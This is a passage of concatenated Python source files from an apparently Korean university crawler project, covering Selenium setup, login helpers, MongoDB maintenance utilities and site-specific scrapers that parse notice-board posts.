chrome_options.add_argument('--disable-dev-shm-usage')
chrome_options.add_argument("--ignore-ssl-errors=true")
chrome_options.add_argument("--ssl-protocol=any")
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument("user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5)AppleWebKit 537.36 (KHTML, like Gecko) Chrome")
driver = webdriver.Chrome(executable_path=path,options=chrome_options)
return driver
```
#### File: crawler/etc/error_handler.py
```python
from modules.crawler.dbs.mongo.db_health import url_health_check
from datetime import datetime
import time
from platform import platform
import os
def error_logging(e, URL, page_url, db):
log_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
log_info = URL['info']
log_url = page_url
print("[ERROR]=====================================================================")
print(log_time, " :: ", log_info, "\nURL :: ", log_url)
print(type(e), "\n", e, "\n\n\n\n")
f = open(os.getenv("SIGNUS_CRAWLER_ERROR_LOG_PATH"),'a')
f_data = "[ERROR]=====================================================================\n"
f_data = f_data + log_time + " :: " + log_info + "\nURL :: " + log_url + "\n"
f_data = f_data + str(type(e)) + "\n" + str(e) + "\n\n"
f.write(f_data)
f.close()
time.sleep(2)
def error_handler(e, URL, page_url, db):
# 앞으로 5번동안 이 사이트 크롤링 일시중지
url_health_check(URL['url'], db)
error_logging(e, URL, page_url, db)
def continue_handler(target, URL, page_url):
log_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
log_info = URL['info']
log_url = page_url
f = open(os.getenv("SIGNUS_CRAWLER_LOG_PATH"),'a')
f_data = "[Continue]==================================================================\n"
f_data = f_data + log_time + " :: " + log_info + "\nURL :: " + log_url + "\n"
f_data = f_data + "Now Crawling :: " + target + "\n\n\n\n"
f.write(f_data)
f.close()
```
#### File: modules/crawler/gz_test_modules.py
```python
import timeit
from datetime import timedelta
from datetime import datetime
import datetime
import time
from modules.crawler.etc.time_convert import datetime_to_mongo
from modules.crawler.etc.time_convert import mongo_to_datetime
from modules.crawler.list.date_cut import date_cut_dict_before
from modules.crawler.list import filtering
from modules.crawler.dbs.mongo.db_connect import connect_db, disconnect_db
from modules.crawler.list.url_list import List
from modules.crawler.login import campuspick
from modules.tokenizer import Tokenizer
from modules.recommender.fasttext import Recommender
import pymongo
from pymongo import MongoClient
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from platform import platform
import os
import hashlib
TK = Tokenizer()
# FT (Recommender) 클래스 선언
# FT = Recommender(os.getenv("SIGNUS_FT_MODEL_PATH"))
# 속도체크
start_time = 0
terminate_time = 0
# 교내 공모전 : insideCampus
# 교외 공모전 : outsideCampus
# 데이터 개수 : limit
def getData(db, limit):
insideCampus = list(db.posts.find({
"$and": [
{ "tag": "공모전&대외활동" },
{ "tag": "교내"},
]
}).sort([('date', -1)]).limit(limit))
outsideCampus = list(db.posts.find({
"$and":[
{ "tag": {"$ne":"교내"} },
{ "tag": "공모전&대외활동" }
]
}).sort([('date', -1)]).limit(limit))
return insideCampus, outsideCampus
def init_db_date(db):
# date 값 싹 날려버리기
date_dict_list = list(db.date.find())
date_list = []
for item in date_dict_list:
date_list.append(item["crawler"])
for item in date_list:
db.date.remove({"crawler":item})
# -------------------------------------------------------------
# 해당 sj date 날려버리기
date_list = list(db.date.find({"crawler":"s"}))
db.date.remove({"crawler":"s"})
for date in date_list:
print(date)
# date_cut에 값 넣고 실행하기
def insert_db_date(db):
date_dict_list = list(db.date.find())
date_list = []
for item in date_dict_list:
date_list.append(item["crawler"])
date_list_before = list(date_cut_dict_before)
for date in date_list_before:
if date in date_list:
pass
else:
query = {
"crawler": date,
"date_exp": "2009-01-01 00:00:00"
}
db.date.insert_one(query)
# 특정 info 삭제
def remove_db_posts(db):
# INFO_LIST=["sig26_campuspick_activity","sig50_campuspick_parttime","sig27_campuspick_language","sig26_campuspick_contest","sig28_campuspick_club","sig55_campuspick_job"]
# for item in INFO_LIST:
# db.posts.remove({"info":item})
# db.recent_post.remove({"info_id":item})
db.posts.remove({"info":"sig54_naver_news"})
# posts DB삭제
def drop_db_collection(db):
INFO_LIST=["thinkgood_info","campuspick_activity","campuspick_contest","campuspick_language",\
"campuspick_job","campuspick_certificate","campuspick_study","campuspick_club","everytime_all",\
"detizen_contest","detizen_activity","jobkoreatip_tip","jobkorea_job","jobkorea_public",\
"rndjob_job","indeed_job","infor_notice","external_notice","review_data","addcampus_board",\
"20lab_column","20lab_infographics","20lab_announcement","20lab_data","20lab_report",\
"vms_volunteer","naver_news","campuspick_parttime","univ20_main","kosaf_info"]
posts = db.posts.find({},{"_id":False, "title":True, "date":True, "post":True, "tag":True,\
"img":True, "url":True, "info":True, "url_hashed":True, "hashed":True, "view":True,\
"fav_cnt":True, "title_token":True, "token":True, "login":True, "learn":True,\
"end_date":True, "topic":True, "ft_vector":True, "popularity":True})
post_list = list(posts)
post_cnt = len(post_list)
print("현재 게시글 개수 ::: ", post_cnt)
no_remove_data = []
remove_data = []
for post in post_list:
if post["info"] in INFO_LIST:
no_remove_data.append(post)
else :
remove_data.append(post)
print("지우면 안되는 데이터 개수 ::: ", len(no_remove_data))
print("지워야 할 데이터 개수 ::: ", len(remove_data))
print("합계 ::: ", len(no_remove_data) + len(remove_data))
if post_cnt == len(no_remove_data) + len(remove_data):
print("CLEAR")
db.posts.drop()
for data in no_remove_data:
db.posts.insert_one(data)
insert_posts_data = db.posts.count_documents({})
print("posts collection count ::: ", insert_posts_data)
def drop_all_collection(db):
db.crawler_log.drop()
db.crawler_manager.drop()
db.target_expire.drop()
db.domain.drop()
db.recent_post.drop()
db.post_info.drop()
db.posts.drop()
db.tag_info.drop()
db.url.drop()
db.category.drop()
def get_post_url(db):
except_info = ["sj20","sj30"]
info_list = []
none_list = [] #posts가 0개인 url들
total = 0
for url_list in List:
info_list.append({"info" : url_list['info'],"cnt":0})
for item in info_list:
crawling_name = item['info'].split("_")[0]
cnt = db.posts.find({"info":item['info']}).count()
item['cnt'] = cnt
if (cnt == 0) and (crawling_name not in except_info):
none_list.append(item)
total += cnt
print("--------------------------------------------------")
print("--------------------------------------------------")
print("::::::::::::::::URL별 POST 개수::::::::::::::::")
for i in info_list:
print(i['info'] + ' : ', i['cnt'] , '개')
print("--------------------------------------------------")
print("--------------------------------------------------\n\n")
print("POST 총 합 : ",total)
print("\n\n")
print("::::::::::::::::::::::::::::::::::::::::::::::::::")
print("::::::::::::::::posts 0 개인 URL들::::::::::::::::")
print("::::::::::::::::::::::::::::::::::::::::::::::::::")
print("::::::::::::::::::::::::::::::::::::::::::::::::::")
for i in none_list:
print(i['info'] + ' : ', i['cnt'] , '개')
print("::::::::::::::::::::::::::::::::::::::::::::::::::")
print("::::::::::::::::::::::::::::::::::::::::::::::::::")
def test_selenium():
options = webdriver.ChromeOptions()
options.add_argument('window-size=1920x1080')
options.add_argument("disable-gpu")
options.add_argument("user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5)AppleWebKit 537.36 (KHTML, like Gecko) Chrome")
options.add_argument("lang=ko_KR")
driver = webdriver.Chrome("C:/Users/82109/Desktop/SIGNUS/SIGNUS/modules/crawler/chromedriver_86.exe", options=options)
driver = campuspick.login(driver)
driver.get('https://www.campuspick.com/job')
scroll_cnt = 0
last_height = driver.execute_script("return document.body.scrollHeight")
while 1:
WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, "p.badges"))) #div.header을 발견하면 에이작스 로딩이 완료됬다는 가정
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
time.sleep(2)
driver.execute_script("window.scrollTo(0, document.body.scrollHeight-50);")
time.sleep(2)
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
scroll_cnt = scroll_cnt + 1
print(scroll_cnt)
if scroll_cnt==20:
break
html = driver.page_source
bs = BeautifulSoup(html,'html.parser')
posts = bs.find("div", {"class": 'list'}).findAll("a", {"class": "top"})
print("포스트 개수 : ",len(posts))
# post와 info_num 매칭 함수
def matching_info_num(db):
for url in List:
info = url['info']
each_posts = list(db.posts.find({"info":info},{"_id":1})) #각각의 url별 모든 게시글 들을 가져온다.
each_info_num = db.post_info.find_one({"info_id" : url['info']})['info_num'] #각각의 url별 정해진 info_num 을 가져온다.
for post in each_posts:
db.posts.update_one(
{'_id': post['_id']},
{"$set": {"info_num": each_info_num}}
)
print(info," 완료!!")
#리토크나이저 함수
def retokenizer(db):
for url in List:
each_url_posts = list(db.posts.find(
{"info":url["info"]})
)
for post_one in each_url_posts:
if post_one["title"][-3:] == "..." and post_one["post"].startswith(post_one["title"][:-3]):
post_one["title_token"] = post_one["post"][:20].split(" ")
else:
post_one["title_token"] = post_one["title"].split(" ")
if post_one["post"].startswith(post_one["title"][:-3]):
post_one["token"] = TK.get_tk(post_one["post"].lower())
else:
post_one["token"] = TK.get_tk(post_one["title"].lower() + post_one["post"].lower())
post_one["token"] = list(url['title_tag'] + post_one["token"])
if 'token' in post_one:
topic_str = post_one["token"]
else:
topic_str = []
post_one["topic_vector"] = FT.doc2vec(topic_str).tolist()
db.posts.update_one(
{'_id':post_one['_id']},
{"$set":{
"title_token":post_one["title_token"],
"token":post_one["token"],
"topic_vector":post_one["topic_vector"]
}
}
)
if __name__ == '__main__':
database = connect_db()
db = database[1]
client = database[0]
#리토크나이저 로컬 테스트용
# retokenizer(db)
#셀레니움 테스트
# test_selenium()
#info num, info 정상매치 함수
# matching_info_num(db)
#각 url별 게시글 개수
get_post_url(db)
#signus db collection 전체 삭제
# drop_all_collection(db)
# posts 데이터 초기화
# drop_db_collection(db)
# posts 데이터 삭제
# remove_db_posts(db)
# date collection insert
# insert_db_date(db)
# date db초기화
# init_db_date(db)
# 세종대 관련 url 삭제 함수
# getPostCnt(db)
# 교내, 교외 공모전 데이터 함수
# start_time = timeit.default_timer()
# insideCampus, outsideCampus = getData(db, 300)
# terminate_time = timeit.default_timer()
# print("\n")
# print("test case 10개")
# print("<<교내 공모전 데이터 개수:",len(insideCampus),">>")
# print("------------------------------------------")
# for i in range(0,100):
# print(i+1,"번째 리스트의 타이틀 :",insideCampus[i]["title"])
# print(i+1,"번째 리스트의 태그 :",insideCampus[i]["tag"])
# print(i+1,"번째 리스트의 info :",insideCampus[i]["info"])
# print(i+1,"번째 리스트의 게시글 작성 날짜 :",insideCampus[i]["date"])
# print("------------------------------------------")
# print("\n")
# print("test case 10개")
# print("<<교외 공모전 데이터 개수:",len(outsideCampus),">>")
# print("------------------------------------------")
# for i in range(0,10):
# print(i+1,"번째 리스트의 타이틀 :",outsideCampus[i]["title"])
# print(i+1,"번째 리스트의 태그 :",outsideCampus[i]["tag"])
# print(i+1,"번째 리스트의 info :",outsideCampus[i]["info"])
# print(i+1,"번째 리스트의 게시글 작성 날짜 :",outsideCampus[i]["date"])
# print("------------------------------------------")
# print("\n교내 공모전 개수 + 교외 공모전 개수 =",len(insideCampus)," +",len(outsideCampus)," =",len(insideCampus)+len(outsideCampus))
# print("\n------------------------------------------")
# print("\n실행 속도 :",(terminate_time - start_time),"초")
# print("\n------------------------------------------")
```
#### File: crawler/list/date_cut.py
```python
from datetime import datetime, timedelta
from pymongo import MongoClient
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
now_minus = datetime.now() + timedelta(days = -1)
now_minus = now_minus.strftime("%Y-%m-%d %H:%M:%S")
date_cut_dict = {}
date_cut_dict_before = {
#세종대 관련 sj
#시그너스 관련 sig
#마감날짜 기준이므로 항상 현재까지만 긁는다.
"sj1": "2009-01-01 00:00:00",\
"sj1_main_FAQ": "2006-01-01 00:00:00",\
"sj2": "2009-01-01 00:00:00",\
#마감날짜 기준이므로 항상 현재까지만 긁는다.
"sj3": now,\
#마감날짜 기준이므로 항상 현재까지만 긁는다.
"sj4": now,\
"sj5": "2009-01-01 00:00:00",\
"sj6": "2009-01-01 00:00:00",\
"sj7": "2009-01-01 00:00:00",\
"sj8": "2009-01-01 00:00:00",\
"sj9": "2009-01-01 00:00:00",\
"sj10": "2009-01-01 00:00:00",\
"sj11": "2009-01-01 00:00:00",\
"sj12": "2009-01-01 00:00:00",\
"sj13": "2009-01-01 00:00:00",\
"sj14": "2009-01-01 00:00:00",\
"sj15": "2009-01-01 00:00:00",\
"sj16": "2009-01-01 00:00:00",\
"sj17": "2009-01-01 00:00:00",\
"sj18": "2009-01-01 00:00:00",\
"sj19": "2009-01-01 00:00:00",\
"sj20": "2009-01-01 00:00:00",\
"sj21": "2009-01-01 00:00:00",\
"sj23": "2009-01-04 00:00:00",\
"sj24": "2009-01-01 00:00:00",\
#마감날짜 기준이므로 항상 현재까지만 긁는다.
"sig25": now,\
"sig26": now_minus,\
"sig27": now_minus,\
"sig28": now_minus,\
"sj29": "2009-01-01 00:00:00",\
"sj30": "2009-01-01 00:00:00",\
"sj31": now,\
"sj32": "2009-01-01 00:00:00",\
"sj33": "2009-01-01 00:00:00",\
"sj34": "2009-01-01 00:00:00",\
"sig35": now,\
"sig36": "2009-01-01 00:00:00",\
"sig37": now,\
"sj38": "2009-01-01 00:00:00",\
"sig39": "2009-01-01 00:00:00",\
"sj40": now,\
"sj41": "2009-01-01 00:00:00",\
"sj42": "2000-01-01 00:00:00",\
"sig43": "2009-01-01 00:00:00",\
"sj44": "2009-01-01 00:00:00",\
#SIGNUS
"sig45": "2009-01-01 00:00:00",\
"sig46": "2009-01-01 00:00:00",\
"sig47": "2009-01-01 00:00:00",\
"sig48": "2009-01-01 00:00:00",\
"sig50": "2009-01-01 00:00:00",\
"sig51": "2009-01-01 00:00:00",\
"sig52": "2009-01-01 00:00:00",\
"sig53": "2009-01-01 00:00:00",\
"sig54": "2009-01-01 00:00:00",\
"sig55": now_minus,\
"sig56": "2009-01-01 00:00:00",\
"sig57": "2009-01-01 00:00:00",\
}
def date_init(db):
date_db = db.target_expire.find()
for date_one in date_db:
date_cut_dict[date_one['crawler']] = date_one['expire_date']
def date_cut(info):
if info.split("_")[2].find("FAQ") != -1: #FAQ이므로 전체긁기를 위해 예외처리
end_date = date_cut_dict['sj1_main_FAQ']
else:
name = info.split("_")[0]
end_date = date_cut_dict[name]
return end_date
```
#### File: crawler/login/daum.py
```python
import requests
from modules.crawler.login import all_login
import time
login_data = all_login.daum()
ID = login_data[0]
PW = login_data[1]
#로그인 하는 cord
def login(driver):
#driver.get('https://logins.daum.net/accounts/loginform.do') #이전버젼
driver.get('https://logins.daum.net/accounts/signinform.do') #수정버젼
driver.implicitly_wait(3)
####로그인정보 보냄####
driver.find_element_by_name('id').send_keys(ID)
driver.find_element_by_name('pw').send_keys(PW)
####로그인버튼 누르기####
driver.find_element_by_xpath('//*[@id="loginBtn"]').click()
time.sleep(3)
return driver
```
#### File: crawler/sj_crawling/sig55.py
```python
from bs4 import BeautifulSoup
from selenium import webdriver
import datetime
from modules.crawler.login import campuspick
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
import time
from modules.crawler.etc.driver_agent import chromedriver
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
#게시판 page_url 을 받으면, 그 페이지의 포스트 url 들을 반환
def Parsing_list_url(URL, page_url, driver):
List = []
#만약 driver이 켜져있으면 끄고, 없으면 그냥 진행
try:
driver.quit()
except:
pass
driver = chromedriver()
#캠퍼스픽 로그인함수
driver = campuspick.login(driver)
List.append(page_url)
data = (driver, List)
return data
#포스트 url을 받으면, 그 포스트의 정보를 dictionary 형태로 반환
def Parsing_post_data(driver, post_url, URL, recent_post):
post_data_prepare = []
domain = Domain_check(URL['url'])
end_date = date_cut(URL['info'])
now_num = 0
end_dday = 0
driver.get(post_url)
post_driver = chromedriver()
post_driver = campuspick.login(post_driver)
last_posts = [0]
flag = 0 # 마감 게시물 연속으로 인한 종료시 값 전달 변수
while 1:
if (now_num > 0) and (now_num % 100 == 0):
print("post_driver를 재시작 합니다.")
post_driver.close()
post_driver = chromedriver() # 포스트 페이지를 위한 드라이버
post_driver = campuspick.login(post_driver)
driver.find_element_by_tag_name("body").send_keys(Keys.END)
time.sleep(1)
html = driver.page_source
bs = BeautifulSoup(html, 'html.parser')
posts = bs.find("div", {"class": 'list'}).findAll("a", {"class": "top"})
#더이상 내릴 수 없으면 break
if len(last_posts) == len(posts):
break
else:
last_posts = posts
for post in posts[now_num:]:
if end_dday == 20: #마감 게시물이 연속으로 20개가 보이면 종료
flag = 1
break
try:
post_data = {}
url = post['href']
url = domain + url
try:
post_driver.get(url)
#driver.get(url)
except:
if len(post_data_prepare) == 0:
recent_post = None
else:
recent_post = post_data_prepare[0]['title']
data = (post_data_prepare, recent_post)
return data
try:
WebDriverWait(post_driver, 30).until(EC.presence_of_element_located((By.CSS_SELECTOR, "p.company"))) #a.item을 발견하면 에이작스 로딩이 완료됬다는 가정
except Exception as e:
print(e)
except:
if len(post_data_prepare) == 0:
recent_post = None
else:
recent_post = post_data_prepare[0]['title']
data = (post_data_prepare, recent_post)
return data
html_post = post_driver.page_source
bs_post = BeautifulSoup(html_post, 'html.parser')
title = bs_post.find("p",{"class":"company"}).get_text(" ", strip = True) + bs_post.find("div",{"class":"content figure"}).find("h1").get_text(" ",strip = True)
date = bs_post.find("div", {"class": "section"}).find("p", {"class": "indent"}).text.strip()
date = date.split("~")[1]
date = date.split("(")[0]
date = date[1:]
now_year = datetime.datetime.now().strftime("%Y")
date = now_year + "년 " + date + " 00:00:00"
date = str(datetime.datetime.strptime(date, "%Y년 %m월 %d일 %H:%M:%S"))
post_content = bs_post.find("div", {'id': "container"}).findAll("div",{"class":"section"})
post_content = post_content[0].get_text(" ", strip = True)+post_content[1].get_text(" ",strip = True)
post_content = post_wash(post_content) #post 의 공백을 전부 제거하기 위함
dead_line = str((bs_post.find("p",{"class":"dday"}).get_text(" ",strip=True)))
if dead_line == "마감":
end_dday = end_dday + 1
else:
end_dday = 0
post_data['title'] = title.upper()
post_data['author'] = ''
post_data['date'] = date
post_data['post'] = post_content.lower()
post_data['img'] = 7
post_data['url'] = url
print(date, "::::", title)
if (date < end_date) or (title.upper() == recent_post):
break
else:
post_data_prepare.append(post_data)
except:
continue
now_num = len(posts)
print("now_num : ", now_num)
if (flag == 1) or (title.upper() == recent_post):
break
if len(post_data_prepare) == 0:
recent_post = None
else:
recent_post = post_data_prepare[0]['title']
data = (post_data_prepare, recent_post)
post_driver.close()
return data
#url을 받으면 url 그대로 반환해준다. => Page number이 필요하지 않는 url
def Change_page(url, page):
return url
#입력된 url의 도메인 url 반환
def Domain_check(url):
domain = url.split('/')[0] + '//' + url.split('/')[2] #도메인 url 추출
return domain
```
#### File: crawler/sj_crawling/sj14.py
```python
import datetime
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut_dict
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
#게시판 n페이지를 받으면, 그 페이지의 포스트 url 리스트 반환
def Parsing_list_url(URL, bs):
List = []
domain = Domain_check(URL['url'])
posts = bs.find("div", {"id": "list_board"}).find("ul", {"class": "lst-board lst-body"}).findAll("li")
for post in posts:
url = post.find("a")['href']
url = domain + url
List.append(url)
return List
#포스트 url을 받으면, 그 포스트의 정보를 dictionary 형태로 반환
def Parsing_post_data(bs, post_url, URL):
return_data = []
post_data = {}
domain = Domain_check(URL['url'])
title = bs.find("div", {"id": "scbd"}).find("div", {"class": "title"}).get_text(" ", strip = True)
author = bs.find("div", {"id": "scbd"}).find("dl").find("span").text.strip()
if author.find("관리자") != -1:
author = "0"
date = bs.find("div", {"id": "scbd"}).find("dl").find("dd").text.strip()
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
post = bs.find("div", {"id": "conbody"}).get_text(" ", strip = True)
post = post_wash(post) #post 의 공백을 전부 제거하기 위함
if bs.find("div", {"id": "conbody"}).find("img") is None:
img = 1
else:
img = bs.find("div", {"id": "conbody"}).find("img")['src'] #게시글의 첫번째 이미지를 가져옴.
if 1000 <= len(img):
img = 1
else:
if img.startswith("http://") or img.startswith("https://"): # img가 내부링크인지 외부 링크인지 판단.
pass
elif img.startswith("//"):
img = "http:" + img
else:
img = domain + img
if img != 1:
if img_size(img):
pass
else:
img = 1
post_data['title'] = title.upper()
post_data['author'] = author.upper()
post_data['date'] = date
post_data['post'] = post.lower()
post_data['img'] = img
post_data['url'] = post_url
return_data.append(post_data)
return_data.append(title)
return_data.append(date)
return return_data
#url을 받으면 Page를 변환시켜서, 변환된 url 반환
def Change_page(url, page):
url_done = url + str(page)
return url_done
#입력된 url의 도메인 url 반환 :::: sj10 에 한해서 /bbs/ 까지 뽑힘
def Domain_check(url):
domain = url.split('/')[0] + '//' + url.split('/')[2] #도메인 url 추출
return domain
```
#### File: crawler/sj_crawling/sj29.py
```python
from bs4 import BeautifulSoup
import datetime
from modules.crawler.login import everytime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
from modules.crawler.etc.driver_agent import chromedriver
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
#게시판 page_url 을 받으면, 그 페이지의 포스트 url 들을 반환
def Parsing_list_url(URL, page_url, driver):
List = []
domain = Domain_check(URL['url'])
#만약 driver이 켜져있으면 끄고, 없으면 그냥 진행
try:
driver.quit()
except:
pass
driver = chromedriver()
driver.get(page_url)
WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, "span.li_list")))
time.sleep(2)
'''
for i in range(int(num)):
driver.find_element_by_xpath('//*[@id="paging"]/li[4]/a').click()
WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, "span.li_num")))
'''
html = driver.page_source
bs = BeautifulSoup(html, 'html.parser')
try:
posts1 = bs.find("ul", {"class": 'listContent'}).findAll("li")
posts2 = bs.find("ul", {"class": 'listContent mb20'}).findAll("li")
posts = posts1 + posts2
except:
try:
posts1 = bs.find("ul", {"class": 'listContent'}).findAll("li")
posts2 = bs.find("ul", {"class": 'listContent mb20'}).findAll("li")
posts = posts1 + posts2
except:
data = (driver, List)
return data
try:
for post in posts:
url = post.find("span", {"class": "li_subject li_list2"}).find("a")['onclick']
url = url.split("'")[1]
url = domain + url
List.append(url)
except:
List = []
data = (driver, List)
return data
#포스트 url을 받으면, 그 포스트의 정보를 dictionary 형태로 반환
def Parsing_post_data(driver, post_url, URL):
return_data = []
post_data = {}
try:
driver.get(post_url)
time.sleep(0.5) #마땅한 기다릴 요소가 없기에 time.sleep(0.5)를 해준다. 네트워크 및 컴퓨터 사양에 따라 ~3까지 증감시킬 것.
html = driver.page_source
bs = BeautifulSoup(html, 'html.parser')
title = bs.find("li", {"class": "vi_subject vi_title"}).get_text(" ", strip = True)
author = bs.find("span", {"id": "regname"}).text.strip()
date = bs.find("span", {"id": "regdate"}).text.strip()
date = date + " 00:00:00"
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
post = bs.find("li", {"id": "contents"}).get_text(" ", strip = True)
post = post_wash(post) #post 의 공백을 전부 제거하기 위함
img = 1
except:
driver.get(post_url)
time.sleep(0.5) #마땅한 기다릴 요소가 없기에 time.sleep(0.5)를 해준다. 네트워크 및 컴퓨터 사양에 따라 ~3까지 증감시킬 것.
html = driver.page_source
bs = BeautifulSoup(html, 'html.parser')
title = bs.find("li", {"class": "vi_subject vi_title"}).text.strip()
author = bs.find("span", {"id": "regname"}).text.strip()
date = bs.find("span", {"id": "regdate"}).text.strip()
date = date + " 00:00:00"
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
post = bs.find("li", {"id": "contents"}).text.strip()
post = post_wash(post) #post 의 공백을 전부 제거하기 위함
img = 1
post_data['title'] = title.upper()
post_data['author'] = author.upper()
post_data['date'] = date
post_data['post'] = post.lower()
post_data['img'] = img
post_data['url'] = post_url
return_data.append(post_data)
return_data.append(title)
return_data.append(date)
return return_data
#url을 받으면 Page를 변환시켜서, 변환된 url 반환
def Change_page(url, page):
url_done = url + str(page)
return url_done
#입력된 url의 도메인 url 반환
def Domain_check(url):
#행복기숙사 포스트 url 형식
domain = "https://happydorm.sejong.ac.kr/sejong/bbs/getBbsWriteView.kmc?&bbs_id=notice&seq="
return domain
```
#### File: crawler/sj_crawling/sj42.py
```python
from bs4 import BeautifulSoup
import datetime
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut_dict
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
#게시판 page_url 을 받으면, 그 페이지의 포스트 url 들을 반환
def Parsing_list_url(URL, bs):
List = []
domain = Domain_check(URL['url'])
#리스트 반환
posts = bs.find("table", {"class": 'bbs_ltype tbl30'}).findAll("tr")
posts = posts[1:]
for post in posts:
target = post.find("a")['href']
page = domain + "/" + target
List.append(page)
return List
#포스트 url을 받으면, 그 포스트의 정보를 dictionary 형태로 반환
def Parsing_post_data(bs, post_url, URL):
return_data = []
post_data = {}
title = bs.find("div", {"class": "view_subject"}).find("h5").get_text(" ", strip = True)
author = bs.find("ul", {"class": "data"}).find("li").text.strip()
date = now
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
post = bs.find("div", {"class": "view_contents"}).get_text(" ", strip = True)
post = post_wash(post)
img = 1
post_data['title'] = title.upper()
post_data['author'] = author.upper()
post_data['date'] = date
post_data['post'] = post.lower()
post_data['img'] = img
post_data['url'] = post_url
return_data.append(post_data)
return_data.append(title)
return_data.append(date)
return return_data
#url을 받으면 Page를 변환시켜서, 변환된 url 반환
def Change_page(url, page):
url_done = url + str(page)
return url_done
#입력된 url의 도메인 url 반환
def Domain_check(url):
domain = url.split('/')[0] + '//' + url.split('/')[2] + "/" + url.split('/')[3] #도메인 url 추출
return domain
```
#### File: crawler/sj_crawling/sj5.py
```python
from bs4 import BeautifulSoup
import datetime
from modules.crawler.login import udream
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut_dict
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
#게시판 page_url 을 받으면, 그 페이지의 url 반환
def Parsing_list_url(URL, page_url):
List = []
List.append(page_url)
return List
#포스트 url을 받으면, 그 포스트의 정보를 dictionary 형태로 반환
def Parsing_post_data(post_url, URL):
post_data_prepare = []
end_date = date_cut_dict['sj5'] # end_date 추출
#udream 로그인하는 함수
s = udream.login()
page = s.get(post_url).text
bs = BeautifulSoup(page, "html.parser")
posts = bs.find("tbody").findAll("tr") #tr묶음
for post in posts:
post_infoes = post.findAll("td") #td 묶음
post_data = {}
title = post_infoes[0].get_text(" ", strip = True)
author = post.find("div").text.strip()
if author.find("관리자") != -1:
author = "0"
date = post_infoes[3].text + " 00:00:00"
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
phrase = post_infoes[1].text + post_infoes[2].get_text(" ", strip = True)
phrase = post_wash(phrase)
img = 1
url_num = str(post_infoes[4].find("a")).split('"')[3]
url = URL['post_url'] + url_num
post_data['title'] = title.upper()
post_data['author'] = author.upper()
post_data['date'] = date
post_data['post'] = phrase.lower()
post_data['img'] = img
post_data['url'] = url
print(date, "::::", title)
#게시물의 날짜가 end_date 보다 옛날 글이면 continue, 최신 글이면 append
if str(date) <= end_date:
continue
else:
post_data_prepare.append(post_data)
s.close()
return post_data_prepare
#url을 받으면 Page를 변환시켜서, 변환된 url 반환
def Change_page(url, page):
url_done = url + str(page)
return url_done
#입력된 url의 도메인 url 반환
def Domain_check(url):
domain = url.split('/')[0] + '//' + url.split('/')[2] #도메인 url 추출
return domain
```
#### File: crawler/sj_crawling/sj8.py
```python
from bs4 import BeautifulSoup
from modules.crawler.etc.url_parser import URLparser
import datetime
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
#게시판 bs_page 을 받으면, 그 페이지의 bs_page 반환
def Parsing_list_url(URL, bs_page):
List = []
List.append(bs_page)
return List
#포스트 url을 받으면, 그 포스트의 정보를 dictionary 형태로 반환
def Parsing_post_data(bs, URL):
post_data_prepare = []
end_date = date_cut(URL['info'])
posts = bs.findAll("div", {"class": "item article"})
for post in posts:
post_infoes = post.findAll("a") #td 묶음
post_data = {}
try:
title = post_infoes[0].get_text(" ", strip = True)
author = post.find("strong").text.strip()
if author.find("관리자") != -1:
author = "0"
date = post.find("span", {"class": "date"})
date = str(date).split(">")[1]
date = str(date).split("<")[0]
date = date + " 00:00:00"
except:
title = post_infoes[0].get_text(" ", strip = True)
try:
author = post.find("strong").text.strip()
except:
author = "0"
if author.find("관리자") != -1:
author = "0"
date = post.find("span", {"class": "date"})
date = str(date).split(">")[1]
date = str(date).split("<")[0]
date = date + " 00:00:00"
try:
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
except:
date = datetime.datetime.now().strftime("%Y-%m-%d")
date = date + " 00:00:00"
try:
phrase = post_infoes[1].get_text(" ", strip = True)
except:
phrase = "0"
phrase = post_wash(phrase)
url = post.find("a")["href"]
#뉴스 url 에 들어가서 img를 가져오기위한 작업
domain = Domain_check(url) #뉴스 url 도메인
driver_page = URLparser(url)
bs_page = BeautifulSoup(driver_page, 'html.parser')
try:
img = bs_page.find("head").find("meta", {"property": "og:image"})['content']
except:
try:
if bs_page.find("body").find("img") is None:
img = 1
else:
img = bs_page.find("body").find("img")['src']
if 1000 <= len(img):
